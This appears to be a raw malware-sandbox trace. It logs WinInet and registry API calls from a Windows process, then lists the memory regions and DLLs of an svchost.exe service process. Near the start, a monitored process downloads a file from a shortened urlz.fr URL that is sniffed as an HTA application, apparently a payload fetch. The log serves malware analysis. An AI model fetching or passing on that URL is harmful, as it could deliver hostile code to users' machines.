[0076.356] StrCmpICA (pszStr1="HTTP/1.0", pszStr2="HTTP/1.1") returned -1
[0076.356] IWinInetInfo:RemoteQueryOption (in: This=0x870044, dwOption=0x17, pBuffer=0x2e4e0b8*=0x0, pcbBuf=0x2e4e0d0*=0x4 | out: pBuffer=0x2e4e0b8*=0x0, pcbBuf=0x2e4e0d0*=0x4) returned 0x0
[0076.356] IWinInetInfo:RemoteQueryOption (in: This=0x870044, dwOption=0x1f, pBuffer=0x2e4e0b8*=0x0, pcbBuf=0x2e4e0d0*=0x4 | out: pBuffer=0x2e4e0b8*=0x0, pcbBuf=0x2e4e0d0*=0x4) returned 0x0
[0076.357] IWinInetInfo:RemoteQueryOption (in: This=0x870044, dwOption=0x42, pBuffer=0x2e4e0d4*=0xcc, pcbBuf=0x2e4e0cc*=0x2cc | out: pBuffer=0x2e4e0d4*=0xcc, pcbBuf=0x2e4e0cc*=0x2cc) returned 0x0
[0076.357] IWinInetInfo:RemoteQueryOption (in: This=0x870044, dwOption=0xfffe, pBuffer=0x86ddc4*=0x0, pcbBuf=0x2e4e0d0*=0x4 | out: pBuffer=0x86ddc4*=0x8, pcbBuf=0x2e4e0d0*=0x4) returned 0x0
[0076.357] IUnknown:Release (This=0x870044) returned 0x5
[0076.357] GetCurrentThreadId () returned 0x14c
[0076.357] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/octet-stream", cchCount1=7, lpString2="charset", cchCount2=7) returned 1
[0076.357] GetCurrentThreadId () returned 0x14c
[0076.358] GetCurrentThreadId () returned 0x14c
[0076.358] MulDiv (nNumber=1, nNumerator=4000, nDenominator=2113) returned 2
[0076.358] MulDiv (nNumber=102, nNumerator=1000, nDenominator=4100) returned 25
[0076.358] MulDiv (nNumber=100, nNumerator=10000, nDenominator=1000) returned 1000
[0076.358] MulDiv (nNumber=1, nNumerator=1000, nDenominator=2112) returned 0
[0076.358] PostMessageW (hWnd=0x1021c, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0076.360] GetCurrentThreadId () returned 0x14c
[0076.360] IInternetProtocol:Read (in: This=0x870040, pv=0x3710b14, cb=0x2000, pcbRead=0x2e4f494 | out: pv=0x3710b14, pcbRead=0x2e4f494*=0x841) returned 0x0
[0076.361] IInternetProtocol:Read (in: This=0x870040, pv=0x3711355, cb=0x17bf, pcbRead=0x2e4f494 | out: pv=0x3711355, pcbRead=0x2e4f494*=0x0) returned 0x1
[0076.362] IInternetProtocolSink:ReportData (This=0x86dd14, grfBSCF=0x15, ulProgress=0x841, ulProgressMax=0x841) returned 0x0
[0076.363] IInternetProtocolSink:ReportResult (This=0x86dd14, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0
[0076.363] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="https://urlz.fr/8gYe", pSecMgr=0x0) returned 0x1
[0076.363] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4f308 | out: phkResult=0x2e4f308*=0x160) returned 0x0
[0076.363] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4f30c | out: phkResult=0x2e4f30c*=0x654) returned 0x0
[0076.364] RegOpenKeyExW (in: hKey=0x654, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4f2c8 | out: phkResult=0x2e4f2c8*=0x0) returned 0x2
[0076.364] RegOpenKeyExW (in: hKey=0x160, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x2e4f2c8 | out: phkResult=0x2e4f2c8*=0x0) returned 0x2
[0076.364] RegCloseKey (hKey=0x0) returned 0x6
[0076.364] RegCloseKey (hKey=0x0) returned 0x6
[0076.364] RegCloseKey (hKey=0x160) returned 0x0
[0076.364] RegCloseKey (hKey=0x654) returned 0x0
[0076.447] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\AXVHa[1].hta", pBuffer=0x2e4f3a8, cbSize=0xc8, pwzMimeProposed="application/octet-stream", dwMimeFlags=0x6, ppwzMimeOut=0x2e4f360, dwReserved=0x0 | out: ppwzMimeOut=0x2e4f360*="application/hta") returned 0x0
[0076.449] CoTaskMemFree (pv=0x372f278)
[0076.449] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="https://urlz.fr/8gYe", pSecMgr=0x0) returned 0x1
[0076.449] StrCmpNIW (lpStr1="applic", lpStr2="image/", nChar=6) returned -1
[0076.449] GetCurrentThreadId () returned 0x14c
[0076.449] SetEvent (hEvent=0x42c) returned 1
[0076.472] GetCurrentThreadId () returned 0x14c
[0076.473] MulDiv (nNumber=2112, nNumerator=4000, nDenominator=2113) returned 3998
[0076.473] GetCurrentThreadId () returned 0x14c
[0076.473] SetEvent (hEvent=0x42c) returned 1
[0076.473] GetCurrentThreadId () returned 0x14c
[0076.473] SetEvent (hEvent=0x42c) returned 1
[0076.474] IUnknown:Release (This=0x86dd14) returned 0x3
Thread:
id = 78
os_tid = 0x698
[0072.970] GetCurrentThreadId () returned 0x698
Thread:
id = 79
os_tid = 0x740
[0073.019] GetCurrentThreadId () returned 0x740
Thread:
id = 80
os_tid = 0x144
[0073.069] GetCurrentThreadId () returned 0x144
Thread:
id = 110
os_tid = 0x79c
[0073.392] GetCurrentThreadId () returned 0x79c
Thread:
id = 111
os_tid = 0x2b0
[0073.769] GetCurrentThreadId () returned 0x2b0
[0073.769] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x74790000
[0073.770] CoInitialize (pvReserved=0x0) returned 0x0
[0073.770] WaitForSingleObject (hHandle=0x42c, dwMilliseconds=0x927c0) returned 0x0
[0076.449] GetTickCount () returned 0x21341
[0076.450] IInternetProtocolRoot:Terminate (This=0x870040, dwOptions=0x0) returned 0x0
[0076.450] IUnknown:Release (This=0x86dcd8) returned 0x7
[0076.450] IUnknown:Release (This=0x86dcd8) returned 0x6
[0076.450] IUnknown:Release (This=0x86dcdc) returned 0x5
[0076.450] IUnknown:Release (This=0x86dcd4) returned 0x4
[0076.450] IUnknown:Release (This=0x86dd14) returned 0x3
[0076.450] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x36f90c0, cbMultiByte=2113, lpWideCharStr=0x3712b24, cchWideChar=2113 | out: lpWideCharStr="\r\n\r\n\r\n\r\n羑좰駝흐\n鬈Ͱꃐͯ躙̇") returned 2113
[0076.450] PostMessageW (hWnd=0x1021c, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0076.458] GetTickCount () returned 0x21351
[0076.458] IUnknown:AddRef (This=0x911444) returned 0xf
[0076.458] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x355f974 | out: lpCPInfo=0x355f974) returned 1
[0076.458] IUnknown:AddRef (This=0x857c00) returned 0x4
[0076.458] IUnknown:AddRef (This=0x911444) returned 0x10
[0076.458] IUnknown:QueryInterface (in: This=0x911444, riid=0x7494d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x355f97c | out: ppvObject=0x355f97c*=0x911444) returned 0x0
[0076.458] IUnknown:Release (This=0x911444) returned 0x10
[0076.458] IUnknown:AddRef (This=0x911444) returned 0x11
[0076.458] IUri:GetScheme (in: This=0x911444, pdwScheme=0x355f980 | out: pdwScheme=0x355f980*=0x2) returned 0x0
[0076.459] IUnknown:Release (This=0x911444) returned 0x10
[0076.459] GetTickCount () returned 0x21351
[0076.460] WaitForSingleObject (hHandle=0x42c, dwMilliseconds=0x927c0) returned 0x0
[0076.473] GetTickCount () returned 0x21360
[0076.473] WaitForSingleObject (hHandle=0x42c, dwMilliseconds=0x927c0) returned 0x0
[0076.473] GetTickCount () returned 0x21360
[0076.474] WaitForSingleObject (hHandle=0x42c, dwMilliseconds=0x927c0) returned 0x0
[0077.468] GetTickCount () returned 0x21573
[0077.468] WaitForSingleObject (hHandle=0x42c, dwMilliseconds=0x927c0) returned 0x0
[0077.650] CoUninitialize ()
[0077.650] FreeLibraryAndExitThread (hLibModule=0x74790000, dwExitCode=0x0)
[0077.650] GetCurrentThreadId () returned 0x2b0
Thread:
id = 112
os_tid = 0x82c
[0074.064] GetCurrentThreadId () returned 0x82c
Thread:
id = 152
os_tid = 0x838
[0077.003] GetCurrentThreadId () returned 0x838
[0077.455] GetCurrentThreadId () returned 0x838
Thread:
id = 153
os_tid = 0x584
[0077.165] GetCurrentThreadId () returned 0x584
Process:
id = "5"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x7c6f000"
os_pid = "0x11c"
os_integrity_level = "0x4000"
os_privileges = "0x60801000"
monitor_reason = "rpc_server"
parent_id = "4"
os_parent_pid = "0xbf0"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c3" [0xc000000f], "LOCAL" [0x7]
Region:
id = 1050
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1051
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1052
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1053
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1054
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1055
start_va = 0xc0000
end_va = 0xc1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1056
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1057
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1058
start_va = 0xf0000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1059
start_va = 0x170000
end_va = 0x26ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1060
start_va = 0x270000
end_va = 0x270fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
Region:
id = 1061
start_va = 0x280000
end_va = 0x290fff
entry_point = 0x280000
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1062
start_va = 0x2a0000
end_va = 0x2a3fff
entry_point = 0x2a0000
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 1063
start_va = 0x2b0000
end_va = 0x2b1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002b0000"
filename = ""
Region:
id = 1064
start_va = 0x2c0000
end_va = 0x2c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1065
start_va = 0x2d0000
end_va = 0x3cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 1066
start_va = 0x3d0000
end_va = 0x48ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 1067
start_va = 0x490000
end_va = 0x50ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1068
start_va = 0x510000
end_va = 0x510fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 1069
start_va = 0x520000
end_va = 0x520fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000520000"
filename = ""
Region:
id = 1070
start_va = 0x550000
end_va = 0x55ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 1071
start_va = 0x560000
end_va = 0x6e7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 1072
start_va = 0x6f0000
end_va = 0x870fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006f0000"
filename = ""
Region:
id = 1073
start_va = 0x880000
end_va = 0xc72fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000880000"
filename = ""
Region:
id = 1074
start_va = 0xc90000
end_va = 0xd0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000c90000"
filename = ""
Region:
id = 1075
start_va = 0xd20000
end_va = 0xd9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d20000"
filename = ""
Region:
id = 1076
start_va = 0xda0000
end_va = 0xe1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000da0000"
filename = ""
Region:
id = 1077
start_va = 0xe60000
end_va = 0xedffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e60000"
filename = ""
Region:
id = 1078
start_va = 0xf10000
end_va = 0xf8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 1079
start_va = 0xf90000
end_va = 0x100ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f90000"
filename = ""
Region:
id = 1080
start_va = 0x1030000
end_va = 0x10affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001030000"
filename = ""
Region:
id = 1081
start_va = 0x10c0000
end_va = 0x138efff
entry_point = 0x10c0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1082
start_va = 0x13c0000
end_va = 0x143ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 1083
start_va = 0x1440000
end_va = 0x153ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001440000"
filename = ""
Region:
id = 1084
start_va = 0x1540000
end_va = 0x15bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001540000"
filename = ""
Region:
id = 1085
start_va = 0x15d0000
end_va = 0x164ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015d0000"
filename = ""
Region:
id = 1086
start_va = 0x1650000
end_va = 0x174ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001650000"
filename = ""
Region:
id = 1087
start_va = 0x17a0000
end_va = 0x181ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017a0000"
filename = ""
Region:
id = 1088
start_va = 0x1820000
end_va = 0x189ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001820000"
filename = ""
Region:
id = 1089
start_va = 0x18a0000
end_va = 0x195ffff
entry_point = 0x18a0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1090
start_va = 0x1990000
end_va = 0x199ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001990000"
filename = ""
Region:
id = 1091
start_va = 0x19a0000
end_va = 0x1a1ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000019a0000"
filename = ""
Region:
id = 1092
start_va = 0x1a30000
end_va = 0x1a3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a30000"
filename = ""
Region:
id = 1093
start_va = 0x1a40000
end_va = 0x1abffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a40000"
filename = ""
Region:
id = 1094
start_va = 0x1b20000
end_va = 0x1b9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b20000"
filename = ""
Region:
id = 1095
start_va = 0x1ba0000
end_va = 0x1c1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ba0000"
filename = ""
Region:
id = 1096
start_va = 0x1c30000
end_va = 0x1caffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001c30000"
filename = ""
Region:
id = 1097
start_va = 0x1cb0000
end_va = 0x1d2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001cb0000"
filename = ""
Region:
id = 1098
start_va = 0x1d70000
end_va = 0x1deffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d70000"
filename = ""
Region:
id = 1099
start_va = 0x1df0000
end_va = 0x1eeffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001df0000"
filename = ""
Region:
id = 1100
start_va = 0x1f20000
end_va = 0x1f9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f20000"
filename = ""
Region:
id = 1101
start_va = 0x1fb0000
end_va = 0x202ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001fb0000"
filename = ""
Region:
id = 1102
start_va = 0x2070000
end_va = 0x207ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002070000"
filename = ""
Region:
id = 1103
start_va = 0x20a0000
end_va = 0x211ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000020a0000"
filename = ""
Region:
id = 1104
start_va = 0x2140000
end_va = 0x21bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 1105
start_va = 0x2200000
end_va = 0x227ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 1106
start_va = 0x2280000
end_va = 0x247ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 1107
start_va = 0x24f0000
end_va = 0x256ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000024f0000"
filename = ""
Region:
id = 1108
start_va = 0x2640000
end_va = 0x26bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002640000"
filename = ""
Region:
id = 1109
start_va = 0x2710000
end_va = 0x278ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 1110
start_va = 0x27d0000
end_va = 0x284ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 1111
start_va = 0x2930000
end_va = 0x29affff
entry_point = 0x0
region_type = private
name = "private_0x0000000002930000"
filename = ""
Region:
id = 1112
start_va = 0x29b0000
end_va = 0x2a2ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029b0000"
filename = ""
Region:
id = 1113
start_va = 0x745d0000
end_va = 0x745d2fff
entry_point = 0x745d0000
region_type = mapped_file
name = "sfc.dll"
filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")
Region:
id = 1114
start_va = 0x77a20000
end_va = 0x77b19fff
entry_point = 0x77a20000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1115
start_va = 0x77b20000
end_va = 0x77c3efff
entry_point = 0x77b20000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1116
start_va = 0x77c40000
end_va = 0x77de8fff
entry_point = 0x77c40000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1117
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1118
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1119
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1120
start_va = 0xffc20000
end_va = 0xffc2afff
entry_point = 0xffc20000
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1121
start_va = 0x7fef2cc0000
end_va = 0x7fef2d01fff
entry_point = 0x7fef2cc0000
region_type = mapped_file
name = "webclnt.dll"
filename = "\\Windows\\System32\\WebClnt.dll" (normalized: "c:\\windows\\system32\\webclnt.dll")
Region:
id = 1122
start_va = 0x7fef3780000
end_va = 0x7fef37dffff
entry_point = 0x7fef3780000
region_type = mapped_file
name = "w32time.dll"
filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll")
Region:
id = 1123
start_va = 0x7fef58b0000
end_va = 0x7fef5987fff
entry_point = 0x7fef58b0000
region_type = mapped_file
name = "perftrack.dll"
filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll")
Region:
id = 1124
start_va = 0x7fef59c0000
end_va = 0x7fef59cbfff
entry_point = 0x7fef59c0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1125
start_va = 0x7fef5ff0000
end_va = 0x7fef6063fff
entry_point = 0x7fef5ff0000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1126
start_va = 0x7fef6e00000
end_va = 0x7fef6e18fff
entry_point = 0x7fef6e00000
region_type = mapped_file
name = "wdi.dll"
filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")
Region:
id = 1127
start_va = 0x7fef6fc0000
end_va = 0x7fef6fcffff
entry_point = 0x7fef6fc0000
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 1128
start_va = 0x7fef6fd0000
end_va = 0x7fef6fe1fff
entry_point = 0x7fef6fd0000
region_type = mapped_file
name = "aepic.dll"
filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll")
Region:
id = 1129
start_va = 0x7fef7190000
end_va = 0x7fef71f3fff
entry_point = 0x7fef7190000
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1130
start_va = 0x7fef7200000
end_va = 0x7fef7270fff
entry_point = 0x7fef7200000
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1131
start_va = 0x7fef8a90000
end_va = 0x7fef8aa8fff
entry_point = 0x7fef8a90000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 1132
start_va = 0x7fef8ab0000
end_va = 0x7fef8ac4fff
entry_point = 0x7fef8ab0000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 1133
start_va = 0x7fef8b10000
end_va = 0x7fef8b8bfff
entry_point = 0x7fef8b10000
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 1134
start_va = 0x7fef90f0000
end_va = 0x7fef9107fff
entry_point = 0x7fef90f0000
region_type = mapped_file
name = "vmictimeprovider.dll"
filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll")
Region:
id = 1135
start_va = 0x7fef92e0000
end_va = 0x7fef92e9fff
entry_point = 0x7fef92e0000
region_type = mapped_file
name = "davhlpr.dll"
filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")
Region:
id = 1136
start_va = 0x7fef9660000
end_va = 0x7fef9677fff
entry_point = 0x7fef9660000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1137
start_va = 0x7fef9680000
end_va = 0x7fef9690fff
entry_point = 0x7fef9680000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1138
start_va = 0x7fef96b0000
end_va = 0x7fef9702fff
entry_point = 0x7fef96b0000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1139
start_va = 0x7fef97e0000
end_va = 0x7fef97e9fff
entry_point = 0x7fef97e0000
region_type = mapped_file
name = "nsisvc.dll"
filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll")
Region:
id = 1140
start_va = 0x7fefb590000
end_va = 0x7fefb59afff
entry_point = 0x7fefb590000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 1141
start_va = 0x7fefb670000
end_va = 0x7fefb67afff
entry_point = 0x7fefb670000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1142
start_va = 0x7fefb680000
end_va = 0x7fefb6a6fff
entry_point = 0x7fefb680000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1143
start_va = 0x7fefb6b0000
end_va = 0x7fefb716fff
entry_point = 0x7fefb6b0000
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1144
start_va = 0x7fefb740000
end_va = 0x7fefb74bfff
entry_point = 0x7fefb740000
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1145
start_va = 0x7fefb800000
end_va = 0x7fefb814fff
entry_point = 0x7fefb800000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1146
start_va = 0x7fefbc10000
end_va = 0x7fefbc17fff
entry_point = 0x7fefbc10000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1147
start_va = 0x7fefc080000
end_va = 0x7fefc097fff
entry_point = 0x7fefc080000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1148
start_va = 0x7fefcd50000
end_va = 0x7fefcd5bfff
entry_point = 0x7fefcd50000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1149
start_va = 0x7fefce20000
end_va = 0x7fefce26fff
entry_point = 0x7fefce20000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 1150
start_va = 0x7fefcf10000
end_va = 0x7fefcf2afff
entry_point = 0x7fefcf10000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1151
start_va = 0x7fefcf30000
end_va = 0x7fefcf4dfff
entry_point = 0x7fefcf30000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1152
start_va = 0x7fefd080000
end_va = 0x7fefd089fff
entry_point = 0x7fefd080000
region_type = mapped_file
name = "credssp.dll"
